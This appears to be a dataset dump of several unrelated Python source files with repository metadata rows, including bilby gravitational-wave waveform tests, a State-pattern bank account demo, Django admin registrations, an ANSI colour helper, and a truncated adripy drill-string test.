"MIT"
] | 1
|
2022-01-07T05:01:32.000Z
|
2022-01-07T05:01:32.000Z
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
"MIT"
] | 3
|
2022-01-07T05:49:44.000Z
|
2022-01-17T07:31:16.000Z
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
"MIT"
] | 1
|
2022-01-07T06:48:40.000Z
|
2022-01-07T06:48:40.000Z
|
from database.redis_client import RedisClient
from database.mysql_client import MysqlClient
from database.mongodb_client import MongoDBClient
| 35.5
| 49
| 0.894366
| 18
| 142
| 6.888889
| 0.555556
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084507
| 142
| 3
| 50
| 47.333333
| 0.953846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
627278a337df155d09a82a342e3e80bc4bf6608f
| 14,867
|
py
|
Python
|
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from copy import copy
import bilby
import lal
import lalsimulation
class TestLalBBH(unittest.TestCase):
    """Tests for ``bilby.gw.source.lal_binary_black_hole``."""

    def setUp(self):
        # Reference precessing-BBH parameters shared by all tests below.
        self.parameters = dict(
            mass_1=30.0,
            mass_2=30.0,
            luminosity_distance=400.0,
            a_1=0.4,
            tilt_1=0.2,
            phi_12=1.0,
            a_2=0.8,
            tilt_2=2.7,
            phi_jl=2.9,
            theta_jn=0.3,
            phase=0.0,
        )
        self.waveform_kwargs = dict(
            waveform_approximant="IMRPhenomPv2",
            reference_frequency=50.0,
            minimum_frequency=20.0,
            catch_waveform_errors=True,
        )
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)
        # Deliberately invalid copy (negative mass) used to probe the
        # waveform-error handling paths.
        self.bad_parameters = copy(self.parameters)
        self.bad_parameters["mass_1"] = -30.0

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array
        del self.bad_parameters

    def test_lal_bbh_works_runs_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.lal_binary_black_hole(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    def test_waveform_error_catching(self):
        """With catch_waveform_errors=True a failed waveform returns None."""
        self.bad_parameters.update(self.waveform_kwargs)
        self.assertIsNone(
            bilby.gw.source.lal_binary_black_hole(
                self.frequency_array, **self.bad_parameters
            )
        )

    def test_waveform_error_raising(self):
        """With catch_waveform_errors=False a failed waveform raises."""
        raise_error_parameters = copy(self.bad_parameters)
        raise_error_parameters.update(self.waveform_kwargs)
        raise_error_parameters["catch_waveform_errors"] = False
        with self.assertRaises(Exception):
            bilby.gw.source.lal_binary_black_hole(
                self.frequency_array, **raise_error_parameters
            )

    def test_lal_bbh_works_without_waveform_parameters(self):
        """The source model also runs with only the physical parameters."""
        self.assertIsInstance(
            bilby.gw.source.lal_binary_black_hole(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    # Removed due to issue with SimInspiralFD - see https://git.ligo.org/lscsoft/lalsuite/issues/153
    # def test_lal_bbh_works_with_time_domain_approximant(self):
    #     self.waveform_kwargs['waveform_approximant'] = 'SEOBNRv3'
    #     self.parameters.update(self.waveform_kwargs)
    #     self.assertIsInstance(
    #         bilby.gw.source.lal_binary_black_hole(
    #             self.frequency_array, **self.parameters), dict)

    def test_lal_bbh_xpprecession_version(self):
        """Different PhenomXPrecVersion values give different waveforms."""
        self.parameters.update(self.waveform_kwargs)
        self.parameters["waveform_approximant"] = "IMRPhenomXP"
        # Test that we can modify the XP precession version
        out_v223 = bilby.gw.source.lal_binary_black_hole(
            self.frequency_array, PhenomXPrecVersion=223, **self.parameters
        )
        out_v102 = bilby.gw.source.lal_binary_black_hole(
            self.frequency_array, PhenomXPrecVersion=102, **self.parameters
        )
        self.assertFalse(np.all(out_v223["plus"] == out_v102["plus"]))
class TestLalBNS(unittest.TestCase):
    """Tests for ``bilby.gw.source.lal_binary_neutron_star``."""

    def setUp(self):
        # BNS parameters, including tidal deformabilities lambda_1/lambda_2.
        self.parameters = dict(
            mass_1=1.4,
            mass_2=1.4,
            luminosity_distance=400.0,
            a_1=0.4,
            a_2=0.3,
            tilt_1=0.2,
            tilt_2=1.7,
            phi_jl=0.2,
            phi_12=0.9,
            theta_jn=1.7,
            phase=0.0,
            lambda_1=100.0,
            lambda_2=100.0,
        )
        self.waveform_kwargs = dict(
            waveform_approximant="IMRPhenomPv2_NRTidal",
            reference_frequency=50.0,
            minimum_frequency=20.0,
        )
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array

    def test_lal_bns_runs_with_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.lal_binary_neutron_star(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    def test_lal_bns_works_without_waveform_parameters(self):
        """The source model also runs with only the physical parameters."""
        self.assertIsInstance(
            bilby.gw.source.lal_binary_neutron_star(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    def test_fails_without_tidal_parameters(self):
        """Dropping lambda_1/lambda_2 raises TypeError."""
        self.parameters.pop("lambda_1")
        self.parameters.pop("lambda_2")
        self.parameters.update(self.waveform_kwargs)
        with self.assertRaises(TypeError):
            bilby.gw.source.lal_binary_neutron_star(
                self.frequency_array, **self.parameters
            )
class TestEccentricLalBBH(unittest.TestCase):
    """Tests for ``bilby.gw.source.lal_eccentric_binary_black_hole_no_spins``."""

    def setUp(self):
        # Non-spinning BBH parameters with a non-zero eccentricity.
        self.parameters = dict(
            mass_1=30.0,
            mass_2=30.0,
            luminosity_distance=400.0,
            theta_jn=0.0,
            phase=0.0,
            eccentricity=0.1,
        )
        self.waveform_kwargs = dict(
            waveform_approximant="EccentricFD",
            reference_frequency=10.0,
            minimum_frequency=10.0,
        )
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array

    def test_lal_ebbh_works_runs_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    def test_lal_ebbh_works_without_waveform_parameters(self):
        """The source model also runs with only the physical parameters."""
        self.assertIsInstance(
            bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
                self.frequency_array, **self.parameters
            ),
            dict,
        )

    def test_fails_without_eccentricity(self):
        """Dropping the eccentricity parameter raises TypeError."""
        self.parameters.pop("eccentricity")
        self.parameters.update(self.waveform_kwargs)
        with self.assertRaises(TypeError):
            bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
                self.frequency_array, **self.parameters
            )
class TestROQBBH(unittest.TestCase):
    """Tests for ``bilby.gw.source.binary_black_hole_roq``."""

    def setUp(self):
        # NOTE(review): hard-coded absolute path — assumes the ROQ basis
        # files are available at /roq_basis in the test environment; confirm
        # against the CI setup.
        roq_dir = "/roq_basis"
        fnodes_linear_file = "{}/fnodes_linear.npy".format(roq_dir)
        fnodes_linear = np.load(fnodes_linear_file).T
        fnodes_quadratic_file = "{}/fnodes_quadratic.npy".format(roq_dir)
        fnodes_quadratic = np.load(fnodes_quadratic_file).T
        # Non-spinning BBH parameters.
        self.parameters = dict(
            mass_1=30.0,
            mass_2=30.0,
            luminosity_distance=400.0,
            a_1=0.0,
            tilt_1=0.0,
            phi_12=0.0,
            a_2=0.0,
            tilt_2=0.0,
            phi_jl=0.0,
            theta_jn=0.0,
            phase=0.0,
        )
        self.waveform_kwargs = dict(
            frequency_nodes_linear=fnodes_linear,
            frequency_nodes_quadratic=fnodes_quadratic,
            reference_frequency=50.0,
            minimum_frequency=20.0,
            approximant="IMRPhenomPv2",
        )
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array

    def test_roq_runs_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.binary_black_hole_roq(self.frequency_array, **self.parameters), dict
        )

    def test_roq_fails_without_frequency_nodes(self):
        """Omitting the ROQ frequency nodes raises KeyError."""
        self.parameters.update(self.waveform_kwargs)
        del self.parameters["frequency_nodes_linear"]
        del self.parameters["frequency_nodes_quadratic"]
        with self.assertRaises(KeyError):
            bilby.gw.source.binary_black_hole_roq(self.frequency_array, **self.parameters)
class TestBBHfreqseq(unittest.TestCase):
    """Tests for ``bilby.gw.source.binary_black_hole_frequency_sequence``.

    The frequency-sequence source model is compared against the full
    ``lal_binary_black_hole`` model evaluated on the same frequencies.
    """

    def setUp(self):
        # Aligned-spin BBH parameters (all tilt/phi angles zero).
        self.parameters = dict(
            mass_1=30.0,
            mass_2=30.0,
            luminosity_distance=400.0,
            a_1=0.4,
            tilt_1=0.,
            phi_12=0.,
            a_2=0.8,
            tilt_2=0.,
            phi_jl=0.,
            theta_jn=0.3,
            phase=0.0
        )
        minimum_frequency = 20.0
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 8)
        # Boolean mask selecting the frequencies handed to the sequence model.
        self.full_frequencies_to_sequence = self.frequency_array >= minimum_frequency
        self.waveform_kwargs = dict(
            waveform_approximant="IMRPhenomHM",
            reference_frequency=50.0,
            minimum_frequency=minimum_frequency,
            catch_waveform_errors=True,
            frequencies=self.frequency_array[self.full_frequencies_to_sequence]
        )
        # Deliberately invalid copy (negative mass) for the error-path tests.
        self.bad_parameters = copy(self.parameters)
        self.bad_parameters["mass_1"] = -30.0

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array
        del self.bad_parameters

    def _assert_matches_lalbbh(self, freqseq, lalbbh, tolerance=1e-15):
        """Assert *freqseq* matches *lalbbh*, restricted to the sequence
        frequencies, with a relative mismatch below *tolerance* per mode.

        Extracted to remove the comparison loop that was previously
        triplicated verbatim across the three ``test_match_LalBBH*`` tests.
        """
        self.assertEqual(freqseq.keys(), lalbbh.keys())
        for mode in freqseq:
            diff = np.sum(np.abs(freqseq[mode] - lalbbh[mode][self.full_frequencies_to_sequence]) ** 2.)
            norm = np.sum(np.abs(freqseq[mode]) ** 2.)
            self.assertLess(diff / norm, tolerance)

    def test_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.binary_black_hole_frequency_sequence(
                self.frequency_array, **self.parameters
            ),
            dict
        )

    def test_waveform_error_catching(self):
        """With catch_waveform_errors=True a failed waveform returns None."""
        self.bad_parameters.update(self.waveform_kwargs)
        self.assertIsNone(
            bilby.gw.source.binary_black_hole_frequency_sequence(
                self.frequency_array, **self.bad_parameters
            )
        )

    def test_waveform_error_raising(self):
        """With catch_waveform_errors=False a failed waveform raises."""
        raise_error_parameters = copy(self.bad_parameters)
        raise_error_parameters.update(self.waveform_kwargs)
        raise_error_parameters["catch_waveform_errors"] = False
        with self.assertRaises(Exception):
            bilby.gw.source.binary_black_hole_frequency_sequence(
                self.frequency_array, **raise_error_parameters
            )

    def test_match_LalBBH(self):
        """Sequence model agrees with LalBBH for the default parameters."""
        self.parameters.update(self.waveform_kwargs)
        freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
            self.frequency_array, **self.parameters
        )
        lalbbh = bilby.gw.source.lal_binary_black_hole(
            self.frequency_array, **self.parameters
        )
        self._assert_matches_lalbbh(freqseq, lalbbh)

    def test_match_LalBBH_specify_modes(self):
        """Agreement also holds when restricting to the (2, 2) mode."""
        parameters = copy(self.parameters)
        parameters.update(self.waveform_kwargs)
        parameters['mode_array'] = [[2, 2]]
        freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
            self.frequency_array, **parameters
        )
        lalbbh = bilby.gw.source.lal_binary_black_hole(
            self.frequency_array, **parameters
        )
        self._assert_matches_lalbbh(freqseq, lalbbh)

    def test_match_LalBBH_nonGR(self):
        """Agreement also holds with a non-GR deviation (DChi0) inserted."""
        parameters = copy(self.parameters)
        parameters.update(self.waveform_kwargs)
        wf_dict = lal.CreateDict()
        lalsimulation.SimInspiralWaveformParamsInsertNonGRDChi0(wf_dict, 1.)
        parameters['lal_waveform_dictionary'] = wf_dict
        freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
            self.frequency_array, **parameters
        )
        lalbbh = bilby.gw.source.lal_binary_black_hole(
            self.frequency_array, **parameters
        )
        self._assert_matches_lalbbh(freqseq, lalbbh)
class TestBNSfreqseq(unittest.TestCase):
    """Tests for ``bilby.gw.source.binary_neutron_star_frequency_sequence``."""

    def setUp(self):
        # BNS parameters including tidal deformabilities lambda_1/lambda_2.
        self.parameters = dict(
            mass_1=1.4,
            mass_2=1.4,
            luminosity_distance=400.0,
            a_1=0.4,
            a_2=0.3,
            tilt_1=0.2,
            tilt_2=1.7,
            phi_jl=0.2,
            phi_12=0.9,
            theta_jn=1.7,
            phase=0.0,
            lambda_1=1000.0,
            lambda_2=1000.0
        )
        minimum_frequency = 50.0
        self.frequency_array = bilby.core.utils.create_frequency_series(2048, 16)
        # Boolean mask selecting the frequencies handed to the sequence model.
        self.full_frequencies_to_sequence = self.frequency_array >= minimum_frequency
        self.waveform_kwargs = dict(
            waveform_approximant="IMRPhenomPv2_NRTidal",
            reference_frequency=50.0,
            minimum_frequency=minimum_frequency,
            frequencies=self.frequency_array[self.full_frequencies_to_sequence]
        )

    def tearDown(self):
        del self.parameters
        del self.waveform_kwargs
        del self.frequency_array

    def test_with_valid_parameters(self):
        """A valid parameter set returns a dict of polarisations."""
        self.parameters.update(self.waveform_kwargs)
        self.assertIsInstance(
            bilby.gw.source.binary_neutron_star_frequency_sequence(
                self.frequency_array, **self.parameters
            ),
            dict
        )

    def test_fails_without_tidal_parameters(self):
        """Dropping lambda_1/lambda_2 raises TypeError."""
        self.parameters.pop("lambda_1")
        self.parameters.pop("lambda_2")
        self.parameters.update(self.waveform_kwargs)
        with self.assertRaises(TypeError):
            bilby.gw.source.binary_neutron_star_frequency_sequence(
                self.frequency_array, **self.parameters
            )

    def test_match_LalBNS(self):
        """Sequence model agrees with the full LalBNS model per mode.

        Uses a looser tolerance (1e-5) than the BBH comparisons (1e-15).
        """
        self.parameters.update(self.waveform_kwargs)
        freqseq = bilby.gw.source.binary_neutron_star_frequency_sequence(
            self.frequency_array, **self.parameters
        )
        lalbns = bilby.gw.source.lal_binary_neutron_star(
            self.frequency_array, **self.parameters
        )
        self.assertEqual(freqseq.keys(), lalbns.keys())
        for mode in freqseq:
            # Relative mismatch of the sequence output against the full
            # model restricted to the sequence frequencies.
            diff = np.sum(np.abs(freqseq[mode] - lalbns[mode][self.full_frequencies_to_sequence])**2.)
            norm = np.sum(np.abs(freqseq[mode])**2.)
            self.assertLess(diff / norm, 1e-5)
# Allow the test module to be executed directly with ``python``.
if __name__ == "__main__":
    unittest.main()
| 34.735981
| 102
| 0.620973
| 1,714
| 14,867
| 5.105601
| 0.108518
| 0.095989
| 0.090504
| 0.055308
| 0.846646
| 0.828591
| 0.82082
| 0.807793
| 0.768027
| 0.750771
| 0
| 0.031085
| 0.285935
| 14,867
| 427
| 103
| 34.81733
| 0.793237
| 0.030134
| 0
| 0.657682
| 0
| 0
| 0.02526
| 0.009368
| 0
| 0
| 0
| 0
| 0.070081
| 1
| 0.091644
| false
| 0
| 0.016173
| 0
| 0.123989
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
658d552b6c0f8fc9454744d828ec43d7a994e0c7
| 3,064
|
py
|
Python
|
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | null | null | null |
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | 3
|
2019-09-30T10:42:24.000Z
|
2019-10-09T12:31:22.000Z
|
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | 3
|
2019-10-08T15:25:45.000Z
|
2019-10-08T16:07:09.000Z
|
class Account:
    """Bank account whose credit behaviour is delegated to a state object
    (State pattern: Gold / Silver / Bronz)."""

    def __init__(self):
        # Every account starts in the Silver state with a balance of 100.
        self._state = Silver(self)
        self.balance = 100

    @property
    def state(self):
        """Current state object."""
        return self._state

    @state.setter
    def state(self, value):
        self._state = value

    def get_balance(self):
        """Return the balance plus the credit granted by the current state."""
        return self._state.credit()

    def set_money(self, money):
        """Deposit *money*; the current state decides any state transition."""
        self._state.set_money(money)

    def get_money(self, money):
        """Withdraw *money*; the current state decides any state transition."""
        self._state.get_money(money)
class Gold:
    """Account state granting the highest credit bonus (10)."""

    def __init__(self, account):
        self._credit = 10
        self._account = account

    @property
    def account(self):
        """The Account this state is attached to."""
        return self._account

    @account.setter
    def account(self, value):
        # BUG FIX: the original assigned to ``self._acount`` (typo), so the
        # setter silently failed to update the account reference.
        self._account = value

    def credit(self):
        """Return the account balance plus the Gold credit bonus."""
        return self._credit + self.account.balance

    def get_money(self, money):
        """Withdraw *money* and re-evaluate the account state."""
        self._account.balance = self._account.balance - money
        self.state_control()

    def set_money(self, money):
        """Deposit *money* and re-evaluate the account state."""
        self._account.balance = self._account.balance + money
        self.state_control()

    def state_control(self):
        # Demote to Bronz below 25, to Silver below 100; otherwise stay Gold.
        if self._account.balance < 25:
            self._account.state = Bronz(self._account)
        elif self._account.balance < 100:
            self._account.state = Silver(self._account)
class Silver:
    """Intermediate account state with a credit bonus of 5."""

    def __init__(self, account):
        self._credit = 5
        self._account = account

    @property
    def account(self):
        """The Account this state belongs to."""
        return self._account

    @account.setter
    def account(self, value):
        self._account = value

    def credit(self):
        """Return the account balance plus the Silver bonus."""
        return self.account.balance + self._credit

    def get_money(self, money):
        """Withdraw *money*, then let the state machine react."""
        self._account.balance -= money
        self.state_control()

    def set_money(self, money):
        """Deposit *money*, then let the state machine react."""
        self._account.balance += money
        self.state_control()

    def state_control(self):
        """Demote to Bronz below 25 or promote to Gold at 100 and above."""
        balance = self._account.balance
        if balance < 25:
            self._account.state = Bronz(self._account)
        elif balance >= 100:
            self._account.state = Gold(self._account)
class Bronz:
    """Lowest account state with a credit bonus of 1."""

    def __init__(self, account):
        self._credit = 1
        self._account = account

    @property
    def account(self):
        """The Account this state is attached to."""
        return self._account

    @account.setter
    def account(self, value):
        # BUG FIX: the original assigned to ``self._acount`` (typo), so the
        # setter silently failed to update the account reference.
        self._account = value

    def credit(self):
        """Return the account balance plus the Bronz credit bonus."""
        return self._credit + self.account.balance

    def get_money(self, money):
        """Withdraw *money* and re-evaluate the account state."""
        self._account.balance = self._account.balance - money
        self.state_control()

    def set_money(self, money):
        """Deposit *money* and re-evaluate the account state."""
        self._account.balance = self._account.balance + money
        self.state_control()

    def state_control(self):
        # Promote to Gold above 100, to Silver at 25 and above; else stay Bronz.
        if self._account.balance > 100:
            self._account.state = Gold(self._account)
        elif self._account.balance >= 25:
            self._account.state = Silver(self._account)
# Demo: drive the account through its Bronz -> Silver -> Gold transitions,
# printing the state class name after each operation.
account = Account()
for operation, amount in (
    (account.get_money, 90),   # 100 -> 10: demoted to Bronz
    (account.set_money, 30),   # 10 -> 40: promoted to Silver
    (account.set_money, 300),  # 40 -> 340: promoted to Gold
):
    operation(amount)
    print(account.state.__class__.__name__)
| 24.512
| 61
| 0.637076
| 367
| 3,064
| 5.008174
| 0.087193
| 0.257345
| 0.205658
| 0.078346
| 0.826442
| 0.778564
| 0.686072
| 0.666485
| 0.666485
| 0.666485
| 0
| 0.012809
| 0.261097
| 3,064
| 124
| 62
| 24.709677
| 0.799028
| 0.005548
| 0
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.293478
| false
| 0
| 0
| 0.086957
| 0.423913
| 0.032609
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6592e0a5a464cb88d3304ccbfc2c373c9c579fdb
| 195
|
py
|
Python
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 24
|
2017-04-10T01:29:44.000Z
|
2021-02-24T03:29:59.000Z
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 1
|
2017-11-21T19:41:45.000Z
|
2017-11-21T19:41:45.000Z
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 7
|
2017-07-24T13:51:07.000Z
|
2021-02-23T15:16:26.000Z
|
from pants.goal.task_registrar import TaskRegistrar as task
from .k8s_clone_namespace import K8SCloneNamespace
def register_goals():
    """Register the ``k8s-clone`` goal, backed by ``K8SCloneNamespace``."""
    clone_task = task(name='k8s-clone', action=K8SCloneNamespace)
    clone_task.install()
| 32.5
| 60
| 0.825641
| 25
| 195
| 6.28
| 0.72
| 0.101911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.087179
| 195
| 5
| 61
| 39
| 0.859551
| 0
| 0
| 0
| 0
| 0
| 0.046154
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
65b06b090c69b1e7d61968c29bdffe54985ada13
| 681
|
py
|
Python
|
colorful.py
|
cxapython/hooker
|
cb63d0569017e3481002934793586a64b16651a3
|
[
"Apache-2.0"
] | 5
|
2021-06-10T06:46:57.000Z
|
2022-02-28T02:27:03.000Z
|
colorful.py
|
z876335662/hooker
|
d0bec95c04aec415fb103c8ceeec4f1cf8112285
|
[
"Apache-2.0"
] | null | null | null |
colorful.py
|
z876335662/hooker
|
d0bec95c04aec415fb103c8ceeec4f1cf8112285
|
[
"Apache-2.0"
] | 2
|
2021-12-14T12:18:07.000Z
|
2022-02-13T08:57:16.000Z
|
'''
Created on 2020-06-06
@author: stephen
'''
# Escape template: reset attributes, apply fg;bg colour, text, reset again.
_ANSI_TEMPLATE = "\33[0m\33[%d;%dm%s\33[0m"


def withColor(string, fg, bg=49):
    """Print *string* with ANSI foreground code *fg* on background *bg*
    (49 = default background)."""
    print(_ANSI_TEMPLATE % (fg, bg, string))


# Foreground colour offsets; add 30 to obtain the ANSI escape code.
Red = 1
Green = 2
Yellow = 3
Blue = 4
Magenta = 5
Cyan = 6
White = 7


def red(string):
    """Print *string* in red."""
    return withColor(string, Red + 30)


def green(string):
    """Print *string* in green."""
    return withColor(string, Green + 30)


def yellow(string):
    """Print *string* in yellow."""
    return withColor(string, Yellow + 30)


def blue(string):
    """Print *string* in blue."""
    return withColor(string, Blue + 30)


def magenta(string):
    """Print *string* in magenta."""
    return withColor(string, Magenta + 30)


def cyan(string):
    """Print *string* in cyan."""
    return withColor(string, Cyan + 30)


def white(string):
    """Print *string* in white."""
    return withColor(string, White + 30)
| 21.967742
| 56
| 0.676946
| 102
| 681
| 4.519608
| 0.343137
| 0.260304
| 0.318872
| 0.409978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066308
| 0.180617
| 681
| 30
| 57
| 22.7
| 0.759857
| 0.133627
| 0
| 0
| 0
| 0
| 0.041739
| 0.041739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0
| 0.304348
| 0.652174
| 0.043478
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
65d7c775da8689873c9b30d870b242c319829844
| 213
|
py
|
Python
|
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Cursos, Aulas, Comentarios, NotasAulas
# Register each course-platform model with the default admin site,
# in the same order as before.
for _model in (Aulas, Cursos, Comentarios, NotasAulas):
    admin.site.register(_model)
| 26.625
| 58
| 0.826291
| 28
| 213
| 6.285714
| 0.428571
| 0.204545
| 0.386364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075117
| 213
| 8
| 59
| 26.625
| 0.893401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
65e618ac964e73cb0c04f9e7807f43df0dc2d0f8
| 36,522
|
py
|
Python
|
test/test_drill_string.py
|
bthornton191/Adams_Modules
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | 5
|
2019-07-01T01:38:44.000Z
|
2020-05-18T00:56:41.000Z
|
test/test_drill_string.py
|
bthornton191/Adams_Modules
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | 4
|
2020-03-24T16:55:01.000Z
|
2021-03-20T00:44:18.000Z
|
test/test_drill_string.py
|
bthornton191/adamspy
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | null | null | null |
"""Tests related to the DrillString class
"""
import unittest
import os
import traceback
from test import *
from adamspy import adripy #pylint: disable=wrong-import-position
class Test_DrillString(unittest.TestCase):
"""Tests the :obj:`DrillString` class.
"""
maxDiff = None
def setUp(self):
# Create a test config file containing the test database
adripy.create_cfg_file(TEST_CONFIG_FILENAME, [TEST_DATABASE_PATH, TEST_NEW_DATABASE_PATH])
# Create a DrillTool object representing a stabilizer
self.pdc_bit = adripy.DrillTool(TEST_PDC_FILE)
# Create a DrillTool object representing a motor
self.motor = adripy.DrillTool(TEST_MOTOR_FILE)
# Create a DrillTool object representing a stabilizer
self.stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Create a DrillTool object representing an mwd
self.mwd = adripy.DrillTool(TEST_MWD_FILE)
# Create a DrillTool object representing a stabilizer
self.upper_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Create a DrillTool object representing a collar
self.collar = adripy.DrillTool(TEST_COLLAR_FILE)
# Create a DrillTool object representing a drill pipe
self.drill_pipe = adripy.DrillTool(TEST_DRILLPIPE_FILE)
# Create a DrillTool object representing EUS
self.eus = adripy.DrillTool(TEST_EUS_FILE)
# Create a DrillTool object representing a top drive
self.top_drive = adripy.DrillTool(TEST_TOP_DRIVE_FILE)
def test_check_references_two_stabs(self):
"""Tests that `DrillString.check_for_references` returns two when checking for references to a stabilizer file in a string that has two references.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add tools to the drill string
drill_string.add_tool(self.pdc_bit)
drill_string.add_tool(self.motor)
